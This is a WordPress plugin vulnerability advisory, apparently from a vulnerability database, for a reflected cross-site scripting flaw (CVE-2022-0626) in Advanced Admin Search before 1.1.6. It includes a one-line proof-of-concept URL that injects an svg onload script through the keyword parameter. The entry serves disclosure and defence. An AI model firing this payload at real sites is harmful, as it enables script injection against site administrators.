WordPress Plugin Vulnerabilities

Advanced Admin Search < 1.1.6 - Reflected Cross-Site Scripting

Description

The plugin does not sanitize and escape some parameters before outputting them back in an admin page, leading to a Reflected Cross-Site Scripting.

Proof of Concept

Affected parameters: keyword, user, metaKey, and metaValue

https://example.com/wp-admin/admin.php?page=advanced-admin-search&keyword="><svg/onload=alert(/XSS/)>

Affects Plugins

Plugin icon
advanced-admin-search
Fixed in 1.1.6

References

CVE
CVE-2022-0626

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Ran Crane
Submitter
Ran Crane
Verified
Yes
WPVDB ID
d72164e2-8449-4fb1-aad3-bfa86d645e47

Timeline

Publicly Published
2022-05-17 (about 1 years ago)
Added
2022-05-17 (about 1 years ago)
Last Updated
2022-06-15 (about 1 years ago)

Other

Published
Title
Published
2024-04-15
Title
Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder < 1.15.24 - Authenticated (Admin+) Stored Cross-Site Scripting
Published
2023-10-12
Title
WP Lightbox 2 <= 3.0.6.5 - Admin+ Stored XSS
Published
2014-08-01
Title
WP eCommerce 3.8.6 - Cross-Site Scripting (XSS)
Published
2021-09-09
Title
Advance Search < 1.1.3 - Reflected Cross-Site Scripting
Published
2024-04-12
Title
POEditor < 0.9.9 - Authenticated (Administrator+) Stored Cross-Site Scripting